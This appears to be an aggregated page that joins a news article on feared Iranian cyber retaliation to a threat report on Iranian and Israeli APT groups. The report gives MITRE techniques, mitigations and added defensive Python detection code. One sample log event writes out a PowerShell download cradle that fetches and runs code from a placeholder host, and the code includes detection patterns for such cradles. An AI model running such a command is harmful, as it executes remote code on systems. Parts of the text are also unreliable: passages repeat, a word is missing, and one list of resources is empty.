US critical networks are prime targets for cyberattacks. They’re preparing for Iran to strike.

Diverging Reports Breakdown

What You Can Do During a Cyber War

The U.S. and Israel targeted Iranian nuclear facilities with the in 2009. The attack was intended to cripple Iranian efforts to enhance their nuclear arsenal. As a result, Iran has been improving its own cyber-capability. Like every new weapon introduced in every war theatre in recorded history, the weapon that once helped gain an advantage can be, and now is being, turned against us. We probably won’t know in advance, and it could take out massive parts of our critical infrastructure: power, water, television, internet, and cell phone communication networks. The government approach to cybersecurity depends largely on where the attack occurs: domestic versus abroad, military versus civilian targets. However, the Department of Homeland Security will issue a statement on the threat level, as it did this past weekend, and coordinate and alert the public. To stay up to date on cyberthreats, consider following popular resources on cyberthreats, such as Cyber Monday and Cyber Security Week, on CNN.com.

If you assassinate a senior political leader in 1914, you can expect a traditional war to follow. If you assassinate a senior political leader in 2020, it would be foolhardy to assume that only a traditional war will follow.

So as the U.S. prepares to deal with fallout from the killing of Iranian General Qassem Soleimani, we must assume, anticipate, and expect that a primary mode of retaliation from Iran will be a cyber attack. And we must prepare for civilians to be caught in the crosshairs.

Most Americans have no idea how to protect themselves from any kind of cyber crime, let alone an offensive, aggressive, and intentionally overt retaliatory attack. Here’s what you need to consider.

What Can You Expect?

“We have been at war with Iran for more than a decade, and people just didn’t realize it,” says James Lewis, the Senior Vice President and Director of the Technology Policy Program at the Center for Strategic and International Studies.

The U.S. and Israel targeted Iranian nuclear facilities with the in 2009; the attack was intended to cripple Iranian efforts to enhance their nuclear arsenal. For a time it worked; however, as a result, Iran has been improving its own cyber-capability. Like every new weapon introduced in every war theatre in recorded history, the weapon that once helped gain an advantage can be, and now is being, turned against us.

Since 2009, Iran has used cyberweapons to attack oil and gas facilities, bank facilities, the electrical grid, and even a tiny dam in upstate New York.

“Iran has been linked to global financial attacks as well as destructive attacks via wiper malware, and increasingly leverages social media for disinformation and pro-regime propaganda,” says Andrea Little Limbago, the Chief Social Scientist at Virtru.

In November 2019, reports came out that Iran was carefully and directly targeting 2,200 facilities, with a strong focus on critical infrastructure and the critical control systems that regulate our water and electrical grids. While Iran’s capacity to attack is not considered as sophisticated as that of China or Russia, Peter Singer, a strategist for the think tank New America, emphatically counters that “to say they have no capability is nonsense.”

An Israeli general put it a slightly different way in 2017 when he said, “They are not the state of the art, they are not the strongest superpower in the cyber dimension, but they are getting better and better.”

“Cyber is the only thing that gives [Iran] the long range reach,” Lewis says. “It’s the easiest way for them to do anything in the U.S.”

ATTA KENARE // Getty Images Iranians are rallying for retaliation for the killing of Iranian General Qassem Soleimani. Could that mean a cyber attack on critical American systems?

When Can You Expect It?

The rising specter of cyber attacks and the ensuing public anxiety highlight that we have very little idea how to prepare for or respond to an attack at the individual level. The government approach to cybersecurity depends largely on where the attack occurs: domestic versus abroad, military versus civilian targets. However, the Department of Homeland Security will issue a statement on the threat level, as it did this past weekend, and coordinate and alert the public.

Additionally, a cyber attack with broad public implications will see similar emergency activation services like any other large public threat, such as hurricanes or snowstorms. The problem? We probably won’t know in advance, and it could take out massive aspects—even for short durations—of our critical infrastructure: power, water, television, internet, and cell phone communication networks.

We should and can trust the government to respond to aggressive overtures from a foreign nation. However, we shouldn’t allow our faith in the government to be a cover for our own ignorance about geopolitical threats. At its best, our government is a reflection of the shared intellect of its people. At its worst, it’s a reflection of the ignorance of the population.

To stay educated on cyberthreats, consider following popular resources like:

ATTA KENARE // Getty Images An Iranian mourner holds a placard during the funeral processions for Qasem Soleimani.

What Can You Do to Protect Yourself?

Iran has gone after commercial and enterprise-related information systems, primarily in oil and gas, SCADA, and other critical infrastructure-related systems. If you work in those environments, you should be particularly cautious.

Threats from China, Russia, or other nations only have the potential to increase in the heightened state of the current environment. This is because a nation or criminal actor wishing to sow dissent could attack the U.S. and attempt to pin attribution on Iran. Chaos in the system creates opportunity for malicious actors.

This means you should follow the basics of good cybersecurity protection:

Always use unique, strong passwords for your web logins.

Be careful with emails that require you to click links or download documents.

Use multi-factor authentication wherever you can.

Don’t use text messages for sensitive communication; substitute encrypted messaging systems, and also consider encrypted email like Proton.

For more tips on general cybersecurity hygiene, visit Don’t Click on That.

Will There Be a Global Escalation of Attacks?

“I don’t want to sound alarmist, but the risk of a cyber attack from Iran is higher now than it has ever been,” says Mike Sexton, Program Director at the Middle East Institute. “That’s not necessarily to say that a cyber retaliation is likely, but that we’ve been rolling dice with Iran for a decade in cyberspace, and we’ve just started using a very dangerous new pair of dice.”

The escalation of war could take a number of different forms, such as attacking our nuclear program, which was recently put online; attacking our satellite infrastructure, which has weak defense mechanisms in place; or attacking a major city. However, Iran is currently unlikely to escalate to this level, according to several senior policy leaders and officials.

Instead, we should anticipate that Iran will look for high-profile events (like the U.S. election) to disrupt, or smaller targets that send a message, but don’t risk catastrophic retaliation. This may include second- or third-tier American cities like Tulsa, Tucson, or Toledo.

“[Iran is] looking for vulnerable targets in places that will get attention,” Lewis says. “It’s easier for them to target in the Middle East, but they have probed smaller targets in the U.S.”

Specifically, experts warn of attacks on our oil and gas infrastructure. Iran has ample knowledge of oil and gas infrastructure, has shown a targeted effort to hack systems that support oil and gas, and knows they’re a critical foundational resource in the American economic system. As such, there’s also heightened concern about the potential targeting of pipelines in the U.S. Disabling a pipeline could result in a disruption of service, an explosion, or an oil spill.

And it doesn’t need to be an actual explosion, Singer says. Sometimes the threat of an attack is enough if rumors of the attack are then propagated through social media. A tweet of misinformation can cause widespread confusion and chaos. As in all things, double-check your sources. If you didn’t trust them before, don’t trust them now.

A Word of Hope

Here’s the good news: It’s unlikely that Iran will respond to the assassination with a cyber attack that will cripple the U.S. for a long period. The risk to Iran isn’t worth the unknown escalatory and retaliatory attack from an administration that’s difficult to predict. As such, we should anticipate a pointed, but smaller scale attack that will shake us, but not destroy the foundations of our country.

That being said, if we don’t learn to protect ourselves individually and collectively, educate ourselves and elect officials who can further protect us, or become wise to and aware of the state of the world around us, we’ll destroy the foundations of our country all on our own.

Source: Popularmechanics.com

Cyber Threats Linked to Iran-Israel Conflict

Escalated tensions between Iran and Israel could give rise to cyber threats. APT groups affiliated with either nation have demonstrated their capacity to launch sophisticated cyber campaigns. Cyber attacks motivated by this conflict could lead to data breaches, operational disruptions, and reputational damage to brands. This report is particularly valuable for organizations engaged in business with Iran or Israel or their vendors or suppliers. If targeted by cyber attacks, these companies could face major supply-chain disruptions. The immediate effects could involve delays in product delivery, increased operational costs, and potentially a halt in production. Such a situation is especially concerning for companies or organizations that use operational technology to operate critical infrastructure, such as water treatment plants, electricity or other energy grids, and healthcare services. Such attacks could not only compromise public safety and national security but also provoke economic instability by disrupting critical infrastructure. The potential impact of such cyber attacks is even more significant in Saudi Arabia and the UAE, where attacks on oil and gas facilities could disturb global energy markets. Additionally, the UAE’s tech and finance sectors are liable to be prime targets for Iranian cyber attacks.

Key Points

Escalated tensions between Iran and Israel could give rise to cyber threats.

Several advanced persistent threat (APT) groups are involved on both sides: APT34, APT35, and CyberAv3ngers in Iran, and Predatory Sparrow in Israel.

Iranian-affiliated APTs utilize a wide array of TTPs, including spearphishing and drive-by compromise, to significantly expand the attack surface for companies with ties to Israel or Israeli vendors.

At-risk organizations can take basic measures to protect themselves from these APT groups, including user training, regular patching, and network segmentation.

In early April 2024, Israel and Iran engaged in retaliatory airstrikes, which resulted in the death of military personnel on both sides and allegedly caused damage to military assets in both nations. While both Iran and Israel have recently expressed their intention to defuse the situation, tensions remain high. These tensions extend to international businesses and corporations that work within the Israeli or Iranian economy. APT groups affiliated with either nation have demonstrated their capacity to launch sophisticated cyber campaigns, targeting not just governmental institutions but also corporate entities. Cyber attacks motivated by this conflict could lead to data breaches, operational disruptions, and reputational damage to brands.

This report examines three prominent advanced persistent threat (APT) groups (APT34, APT35, and CyberAv3ngers) based in or linked to Iran, known for targeting Israel and its associated entities. Additionally, the report includes a concise overview of a group (Predatory Sparrow) focusing on Iranian targets that is believed to be connected to Israel. We also delve into the common tactics, techniques, and procedures (TTPs) these groups utilize and present key advice for detection and mitigation of these threats. This report is particularly valuable for organizations engaged in business with Iran or Israel or their vendors or suppliers.

Iranian Threats

Strategic deployment of APT and hacktivist groups is a key component of Iran’s cyber warfare tactics. These groups are often ideologically driven, aiming to gather intelligence and disrupt the normal functioning of critical infrastructure and corporate entities. By infiltrating networks through sophisticated spearphishing campaigns, exploiting zero-day vulnerabilities, and deploying bespoke malware, these groups can steal sensitive information, damage systems, and cripple financial operations, causing significant economic and reputational harm.

Israeli government and military organizations and companies in integral business industries like finance, energy, telecommunications, and technology are natural targets whose disruption could undermine Israel’s economic stability and international standing. However, the threat from Iranian APT and hacktivist groups also extends further:

**For foreign companies that conduct business with Israel-based firms or that operate within Israel:** Cyber attacks by Iran-linked groups on these companies could result in severe operational disruptions and financial losses. The outcomes may include data breaches, compromise of sensitive information, significant operational downtime, and possibly reputational damage that could impact the company in other markets globally.

**For companies based outside Israel that use Israel-based suppliers:** If targeted by cyber attacks, these companies could face major supply-chain disruptions. The immediate effects could involve delays in product delivery, increased operational costs, and potentially a halt in production, affecting not just the directly targeted companies but also downstream customers relying on their products or services. Such a situation is especially concerning for companies or organizations that use operational technology (OT) to operate critical infrastructure, such as water treatment plants, electricity or other energy grids, and healthcare services.

**For critical sector organizations in the US and UK:** Targeted cyber attacks against these entities could severely disrupt essential services, including power, water, and healthcare systems. The strategic response from these nations, coupled with their technological and infrastructural significance, makes them prime targets for cyber operations with the intent of undermining their support for Israel. Such attacks could not only compromise public safety and national security but also provoke economic instability by disrupting critical infrastructure.

**For companies operating in Middle Eastern countries that supported Israel’s response:** Cyber attacks by Iran-linked groups carry substantial risks, given these countries’ strategic economic roles and geopolitical positions. In Jordan, cyber operations targeting the vital tourism and export sectors could lead to extensive economic repercussions amid an already dim economic outlook. The potential impact of such cyber attacks is even more significant in Saudi Arabia and the UAE, where attacks on oil and gas facilities could disturb global energy markets. Additionally, the UAE’s tech and finance sectors are liable to be prime targets for Iranian cyber attacks, which could erode investor confidence and inhibit innovation, affecting both the local economy and international investments.

This report profiles three Iranian-linked APT groups, outlining their tactics, techniques, and procedures (TTPs), while also providing customers with detection and mitigation strategies. APT34 is highlighted for its long-standing operations. APT35 is examined for its extensive campaigns against government, defense, and critical infrastructure entities in America, Europe, and the Middle East, utilizing spearphishing, social engineering, and bespoke malware. Lastly, the focus shifts to CyberAv3ngers, a group specializing in attacks on industrial control and operational technology systems, particularly through internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMI). This exploration emphasizes the growing convergence of IT and OT systems, underscoring the expanded attack surface and the internet as a prevalent entry point for cyber attacks.

APT34

The cyber espionage group APT34 (aka Twisted Kitten, Cobalt Gypsy, Crambus, Helix Kitten) focuses on infiltrating and conducting operations against high-value entities in the Middle East, including government bodies, critical infrastructure, telecommunications networks, and pivotal regional organizations. Its varied arsenal of techniques includes social engineering attacks via legitimate social networking sites, destructive operations using wiper malware, and exploiting trusted relationships to compromise supply chains. The following TTPs have featured prominently in many of the group’s campaigns.

T1566: Spearphishing Attachment

APT34 favors spearphishing to secure initial entry into target systems. The group employs social engineering tactics, often by attaching Microsoft Office or PDF documents laden with malware to its deceptive emails. To tackle the threat of spearphishing attacks, organizations should consider:

Educating employees on the risks of spearphishing attacks, emphasizing the importance of scrutinizing email attachments and links, even if they appear to come from legitimate sources.

Limiting user access rights within the organization to the minimum necessary to perform duties.

Deploying sophisticated email filtering solutions that can detect and quarantine emails containing malicious attachments or suspicious links, particularly those mimicking Microsoft Office or PDF formats.

T1059: Command and Scripting Interpreter: PowerShell

APT34 has used PowerShell-based backdoors in cyber attacks across the Middle East, leveraging PowerShell’s ostensibly legitimate capabilities to create fileless malware that leaves no on-disk traces. This method allows for complex operations within the operating system, data exfiltration, and lateral network movement. Continuous reloading of malicious code into memory also ensures attacker persistence within compromised systems. To mitigate this technique, organizations should:

Implement robust logging and monitoring of PowerShell activity to detect unusual or unauthorized commands that could indicate malicious behavior.

If PowerShell usage is essential, limit its execution policy solely to administrators. Using PowerShell JEA (Just Enough Administration) can also help confine administrative tasks by restricting the commands that admins or users can run during remote PowerShell sessions.

Regularly educate and train IT staff and system administrators on the potential misuse of PowerShell, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.
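One way to implement the logging-and-monitoring recommendation above, as an added example that is not the report's or ReliaQuest's own code: a Python triage pass over PowerShell Script Block Logging (Event ID 4104) records as a SIEM would hand them over, flagging download cradles, encoded commands, hidden windows and in-memory assembly loading, and re-checking the decoded form of any encoded command. The events, hosts and users are constructed, and the encoded command decodes to a harmless Write-Output.

```python
"""Triage of PowerShell Script Block Logging (Event ID 4104) records.

Added example for the T1059 monitoring recommendation; not the report's code.
All events are constructed; the encoded command decodes to a harmless
Write-Output so the sample carries no working payload.
"""
import base64
import re

# Detection rules applied to ScriptBlockText. The names are our own labels.
RULES = [
    # Invoke-Expression fed by a web download: a fileless "download cradle".
    ("download_cradle",
     re.compile(r"(Invoke-Expression|\bIEX\b).*(DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b)", re.I)),
    # Base64-encoded command line argument.
    ("encoded_command",
     re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Window hidden from the interactive user.
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    # Assembly decoded from base64 and loaded straight into memory.
    ("in_memory_load",
     re.compile(r"FromBase64String.*(Reflection\.Assembly\]::Load|Invoke-Expression)", re.I | re.S)),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Constructed sample events, shaped like a SIEM's parsed 4104 records.
HARMLESS = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws01", "user": "CORP\\alice",
     "script_block": "Get-ChildItem C:\\Reports | Where-Object { $_.Length -gt 1MB }"},
    {"event_id": 4104, "host": "ws02", "user": "CORP\\bob",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage')"},
    {"event_id": 4104, "host": "ws03", "user": "CORP\\svc-backup",
     "script_block": "powershell.exe -NoP -W Hidden -EncodedCommand " + HARMLESS},
    {"event_id": 4104, "host": "ws04", "user": "CORP\\carol",
     "script_block": "$b = [Convert]::FromBase64String($x); [Reflection.Assembly]::Load($b)"},
]


def decode_encoded_command(block):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENC_RE.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Run every rule over the script block and, if present, over its decoded form."""
    block = event["script_block"]
    hits = [name for name, rx in RULES if rx.search(block)]
    decoded = decode_encoded_command(block)
    if decoded:
        # Encoding must not hide a cradle: re-check the decoded text as well.
        hits += [name + ":decoded" for name, rx in RULES if rx.search(decoded)]
    return {"host": event["host"], "user": event["user"],
            "hits": hits, "decoded": decoded}


def triage(events):
    """Return only the 4104 events that matched at least one rule."""
    return [a for a in (analyze_event(e) for e in events if e["event_id"] == 4104)
            if a["hits"]]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The rules are deliberately narrow; in production they would sit beside an allow-list of the organisation's own management scripts to keep the hit list reviewable.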

T1078: Valid Accounts

APT34 infiltrates systems by using legitimate credentials obtained from phishing or other means, enabling it to move laterally within networks undetected. This method allows the group to discreetly explore and exfiltrate sensitive data. Compromised credentials can be used to circumvent access controls across network systems, allow persistent remote system access via services like virtual private networks (VPNs) and remote desktops, and may enable attackers to access restricted network areas or obtain elevated system privileges. Combat this tactic by:

Enforcing multifactor authentication (MFA) across all user accounts to add an additional layer of security, which can significantly reduce the risk of unauthorized access even if credentials are compromised.

Conducting frequent audits of user accounts and monitoring for unusual activity patterns.

Regularly educating and training IT staff and system administrators on the potential misuse of valid accounts, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.

APT35

Security researchers have linked APT35 (aka COBALT MIRAGE, PHOSPHORUS, G0059, NewsBeef, Charming Kitten, Magic Hound, TunnelVision, Ajax Security, Newscaster Team) to the Islamic Revolutionary Guard Corps (IRGC). APT35 conducts long-term, resource-intensive campaigns primarily targeting American, European, and Middle Eastern government, defense, and critical infrastructure organizations. APT35 primarily conducts cyber espionage using spearphishing, social engineering, and custom malware techniques; however, it has also exploited Microsoft BitLocker to encrypt targets’ data in exchange for ransom payments. Despite APT35’s adoption of diverse strategies, three specific TTPs are common vectors in its campaigns:

T1193: Spearphishing Attachment

In one notable example of this tactic in use, APT35 was linked with a phishing campaign that targeted an Israeli journalist, using a fake draft report as bait. This deceptive draft report came as a password-protected RAR file that embedded a harmful LNK file designed to deploy the “PowerStar” malware—a refined variant of its established backdoor named “CharmPower.”

The following recommendations can help defend against spearphishing.

Deploy data loss prevention (DLP) solutions to monitor and control data transfers, preventing sensitive information from being leaked or sent to unauthorized recipients.

Implement Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting & Conformance (DMARC) to detect and prevent email spoofing, making it harder for attackers to impersonate legitimate entities.

Conduct mock spearphishing campaigns to test employee awareness and preparedness, providing feedback and training as needed.
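The SPF/DKIM/DMARC recommendation above, as an added example that is not the report's own code: a Python checker that rates a domain's anti-spoofing posture from its TXT records, using a constructed table of DNS answers for hypothetical domains in place of live lookups. DKIM is not assessed because verifying it requires knowing the sender's selector.

```python
"""Offline SPF/DMARC posture check.

Added example for the anti-spoofing recommendation (SPF/DKIM/DMARC); not the
report's own code. DNS answers are a constructed table so the check runs
offline; DKIM is skipped because it needs the sender's selector.
"""
import re

# Constructed TXT records for hypothetical domains.
DNS_TXT = {
    "weak.example": ["v=spf1 include:_spf.mailhost.example ~all"],
    "_dmarc.weak.example": ["v=DMARC1; p=none; rua=mailto:dmarc@weak.example"],
    "strong.example": ["v=spf1 ip4:192.0.2.10 include:_spf.mailhost.example -all"],
    "_dmarc.strong.example": ["v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@strong.example; adkim=s; aspf=s"],
    "none.example": [],
}
# Mechanisms and modifiers that each cost one of SPF's ten permitted DNS lookups.
LOOKUP_RE = re.compile(r"^[+\-~?]?(include:|a\b|mx\b|ptr\b|exists:|redirect=)", re.I)


def parse_spf(record):
    """Return (terms, qualifier of the 'all' mechanism or None), or None if not SPF."""
    if not record.lower().startswith("v=spf1"):
        return None
    terms = record.split()[1:]
    all_qualifier = None
    for term in terms:
        qualifier, body = (term[0], term[1:]) if term[0] in "+-~?" else ("+", term)
        if body.lower() == "all":
            all_qualifier = qualifier
    return terms, all_qualifier


def parse_dmarc(record):
    """Return the DMARC tag/value pairs as a dict (keys lower-cased), or None if not DMARC."""
    if not record.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def first_record(records, prefix):
    return next((r for r in records if r.lower().startswith(prefix)), None)


def assess(domain, txt):
    """Return a list of findings; an empty list means no weakness was spotted."""
    findings = []
    spf = first_record(txt.get(domain, []), "v=spf1")
    dmarc = first_record(txt.get("_dmarc." + domain, []), "v=dmarc1")

    if spf is None:
        findings.append("no SPF record: any host can claim to send for this domain")
    else:
        terms, all_q = parse_spf(spf)
        if all_q is None:
            findings.append("SPF has no 'all' mechanism: unlisted senders evaluate as neutral")
        elif all_q in "+?":
            findings.append(f"SPF ends in '{all_q}all': unlisted senders are not rejected")
        elif all_q == "~":
            findings.append("SPF ends in '~all' (softfail): pair it with DMARC p=reject or p=quarantine")
        lookups = sum(1 for t in terms if LOOKUP_RE.match(t))
        if lookups > 10:
            findings.append(f"SPF needs {lookups} DNS lookups (limit 10): evaluates as permerror")

    if dmarc is None:
        findings.append("no DMARC record: receivers have no policy for mail failing SPF/DKIM")
    else:
        tags = parse_dmarc(dmarc)
        policy = tags.get("p", "none").lower()
        if policy == "none":
            findings.append("DMARC p=none: spoofed mail is reported but still delivered")
        elif int(tags.get("pct", "100")) < 100:
            findings.append(f"DMARC pct={tags['pct']}: policy applies to only part of the traffic")
        if "rua" not in tags:
            findings.append("DMARC has no rua= address: aggregate reports are not collected")
    return findings


if __name__ == "__main__":
    for d in ("weak.example", "strong.example", "none.example"):
        print(d, assess(d, DNS_TXT) or ["ok"])
```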

T1189: Drive-by Compromise

APT35 has used drive-by compromise techniques in its campaigns against Israel’s transportation, logistics, and technology sectors. The group has strategically manipulated legitimate websites to divert visitors to attacker-managed sites designed to phish for personal information and credentials. Once collected, this data is transmitted to a predefined domain for use in subsequent attacks. Recommended protective strategies include:

Ensure that all web applications are up to date with the latest security patches to minimize vulnerabilities that could be exploited in drive-by compromise attacks.

Use web filtering solutions to block known malicious sites and monitor web traffic for unusual redirections or attempts to access phishing sites.

Regularly educate employees about the risks of drive-by compromises and train them to recognize phishing attempts, emphasizing the importance of not entering personal information or credentials on unfamiliar websites.

T1595: Active Scanning: Vulnerability Scanning

APT35 has conducted extensive scans to pinpoint public systems susceptible to specific vulnerabilities, including CVE-2021-44228 in Log4j, the ProxyShell set of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in on-premises Microsoft Exchange Servers, and CVE-2018-13379 in Fortinet FortiOS Secure Sockets Layer (SSL) VPNs. Organizations should consider:

Ensuring that all web applications, especially critical software such as VPNs, are up to date with the latest security patches to minimize vulnerabilities that could be exploited by threat actors using active scanning techniques.

Dividing network resources into segments to reduce the attack surface and closely monitoring traffic for unusual patterns that could indicate a scanning attempt or exploitation.

Applying strict access controls and authentication measures to all users and devices, limiting the potential impact of exploited vulnerabilities.

CyberAv3ngers

Active since 2020, CyberAv3ngers (aka CyberAveng3rs and Cyber Avengers) has been linked with the IRGC. CyberAv3ngers is a politically motivated group that primarily targets industrial control systems, OT, or critical infrastructure using programmable logic controllers (PLCs) and human machine interfaces (HMI) connected to the internet. On November 22, 2023, CyberAv3ngers carried out a successful cyber attack on multiple water and wastewater facilities in the US that were employing PLCs with HMIs built in Israel. The group likely gained access by exploiting internet-connected devices that were protected by default passwords. Public information on CyberAv3ngers’ TTPs is limited, but security researchers have highlighted its distinctive use of brute-force techniques.

T1110: Brute Force

Adversaries may use brute-force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. In the case of the CyberAv3ngers attack on water and wastewater facilities in the US, the attackers employed scanning tools to pinpoint accessible internet-connected devices. Subsequently, they gained entry by utilizing the default PLC credentials, which are often readily available in OT manuals available online. To protect against brute-force techniques, organizations should:

Immediately update default usernames and passwords for all OT devices to unique, strong credentials to prevent unauthorized access.

Implement routine scanning of networked devices to identify and secure internet-facing devices that may be vulnerable to unauthorized access.

Enhance network security measures by employing firewalls, VPNs, and network segmentation to limit the exposure of critical OT devices to the internet.
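An added example for the scanning and default-credential recommendations above, not the report's own code: a Python detector that reads constructed login lines from a hypothetical HMI's syslog, raises a brute-force alert when failures from one source pile up inside a sliding window, and flags a successful login with a vendor-default account from outside an allow-listed engineering subnet. The log format, device name, account names and subnet are all assumptions.

```python
"""Brute-force and default-account detection for an internet-exposed HMI/PLC.

Added example for the T1110 recommendations; not the report's own code.
Log format, device name, account names and subnet are hypothetical, and
the log lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Hypothetical syslog line shape emitted by the device's web login.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) auth: login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$")
DEFAULT_ACCOUNTS = {"admin", "operator"}      # assumed vendor defaults (the kind found in OT manuals)
TRUSTED_NETS = [ip_network("10.20.0.0/16")]   # assumed engineering VLAN allowed to log in
WINDOW = timedelta(seconds=60)                # sliding window for counting failures
FAIL_THRESHOLD = 5                            # failures within WINDOW that count as brute force
SUCCESS_AFTER = 3                             # failures before a success that suggest a guessed password

# Constructed sample: a burst against the admin account from an unknown address,
# then a normal engineer typo from the trusted VLAN.
SAMPLE_LOG = """\
2024-01-10T03:14:00Z hmi-pump-01 auth: login failed user=admin src=198.51.100.23
2024-01-10T03:14:05Z hmi-pump-01 auth: login failed user=admin src=198.51.100.23
2024-01-10T03:14:09Z hmi-pump-01 auth: login failed user=admin src=198.51.100.23
2024-01-10T03:14:12Z hmi-pump-01 auth: login failed user=admin src=198.51.100.23
2024-01-10T03:14:16Z hmi-pump-01 auth: login failed user=admin src=198.51.100.23
2024-01-10T03:14:20Z hmi-pump-01 auth: login ok user=admin src=198.51.100.23
2024-01-10T07:02:11Z hmi-pump-01 auth: login failed user=jsmith src=10.20.0.7
2024-01-10T07:02:30Z hmi-pump-01 auth: login ok user=jsmith src=10.20.0.7
""".splitlines()


def parse(line):
    """Parse one log line into a dict, or None if it is not a login record."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def is_external(src):
    """Anything outside the allow-listed engineering networks is treated as external."""
    addr = ip_address(src)
    return not any(addr in net for net in TRUSTED_NETS)


def detect(lines):
    """Return alerts as (rule, host, src, detail) tuples, in log order."""
    alerts = []
    failures = defaultdict(deque)   # (host, src) -> timestamps of recent failures
    burst_reported = set()
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        key = (ev["host"], ev["src"])
        recent = failures[key]
        while recent and ev["ts"] - recent[0] > WINDOW:
            recent.popleft()        # drop failures that fell out of the window
        if ev["result"] == "failed":
            recent.append(ev["ts"])
            if len(recent) >= FAIL_THRESHOLD and key not in burst_reported:
                burst_reported.add(key)
                alerts.append(("brute_force", ev["host"], ev["src"],
                               f"{len(recent)} failures within {WINDOW.seconds}s"))
            continue
        # Successful login: was it preceded by guessing, and is it a default account from outside?
        if len(recent) >= SUCCESS_AFTER:
            alerts.append(("success_after_failures", ev["host"], ev["src"],
                           f"user={ev['user']} after {len(recent)} failures"))
        if ev["user"] in DEFAULT_ACCOUNTS and is_external(ev["src"]):
            alerts.append(("default_account_external", ev["host"], ev["src"],
                           f"user={ev['user']}"))
        recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```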

Israeli Threats

The full extent of Israel’s offensive cyber capabilities is largely speculative: cybersecurity research and intelligence analysis have hypothesized about Israel’s cyber activities, but the Israeli government does not admit to conducting offensive cyber operations through affiliated entities. This approach helps keep cyber warfare tactics confidential, minimize diplomatic fallout, and maintain plausible deniability in the international arena. Hypothetically, Israeli cyber initiatives targeting Iran would be motivated by a desire to thwart Iran’s nuclear plans, collect vital intelligence, and bolster national security through the proactive neutralization of threats. In targeting Iran, then, Israeli cyber groups might focus on critical sectors such as defense and nuclear research, alongside communication and financial systems. Such attacks would aim to strategically weaken Iran’s capabilities and apply economic strain.

Organizations should remain vigilant about the potential repercussions of Israeli cyber activities against Iranian interests. Such actions could provoke retaliatory cyber attacks from Iranian actors, not only against Israeli entities but also against international businesses perceived to have business ties with Israeli companies. These tit-for-tat attacks could expose these organizations to data breaches, operational disruptions, and compromise of sensitive information. Understanding this dynamic is vital for businesses to prepare and strengthen their cybersecurity defenses, anticipating the broader implications of geopolitical tensions manifesting in the cyber realm. This awareness is especially important for entities with ties to Israel, as they may inadvertently become targets in the escalating cyber conflict between these nations.

In light of these conditions, the following section of the report covers a prominent Israel-linked group that has focused on targeting Iranian critical infrastructure.

Predatory Sparrow

Active since 2021, Predatory Sparrow (aka Gonjeshke Darande) has claimed responsibility for cyber attacks on Iranian industrial plants and critical infrastructure. In 2021, the group disrupted Iran’s nationwide network of 4,300 gas stations by disabling the system for purchasing fuel with government-issued subsidy cards. The following year, they escalated their activities by targeting three state-owned industrial steel factories, hijacking control systems to cause equipment malfunctions and molten steel spills, resulting in significant fire damage. Continuing their offensive into 2023, Predatory Sparrow claimed to have incapacitated 70 percent of Iranian gas station infrastructure, severely hampering the country’s fuel distribution capabilities.

Although Predatory Sparrow’s cyber attacks have garnered significant attention, Iran’s reluctance to disclose details of assaults on its critical infrastructure has left a lack of information on the group’s specific TTPs. Nevertheless, insights from the ReliaQuest Threat Research Team, particularly its analyses of the targeting of OT systems by Chinese APT groups, allow us to infer the TTPs that a group like Predatory Sparrow would likely employ against such targets. That knowledge base provides a foundational understanding of the operational methods Predatory Sparrow potentially uses in its cyber campaigns.

T1021.001: Remote Services: Remote Desktop Protocol

Adversaries may use valid accounts to log in to a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Threat actors such as Predatory Sparrow can use this technique to move laterally to the domain controller (DC) via an interactive RDP session using a compromised account with domain administrator privileges. Combat this threat by:

Disabling remote interactive logon of service accounts to prevent them from being used for RDP.

Configuring and enabling MFA for RDP sessions, helping to prevent lateral RDP and RDP brute-forcing.

Adhering to the principle of least privilege and minimizing RDP to only the required accounts. Configure access to critical assets that require RDP to use designated jump boxes, allowing tighter access control and improved auditing.

T1190: Exploit Public-Facing Application

Through this approach, attackers exploit vulnerabilities in external-facing systems or devices to gain initial entry into a network. These vulnerabilities could stem from software bugs, temporary system faults, or configuration errors. Adversaries often target edge network devices and infrastructure components that lack strong host-based protections. APT groups frequently exploit flaws in networking appliances, including products from Fortinet, Ivanti, NETGEAR, Citrix, and Cisco, to infiltrate networks. To protect against these types of attacks, organizations can:

Utilize security tools, such as a web application firewall (WAF), to protect public-facing applications and provide logging visibility into access and requests to and from the application.

Properly segment all public-facing applications from the intranet to minimize risk of exploitation compromising sensitive infrastructure.

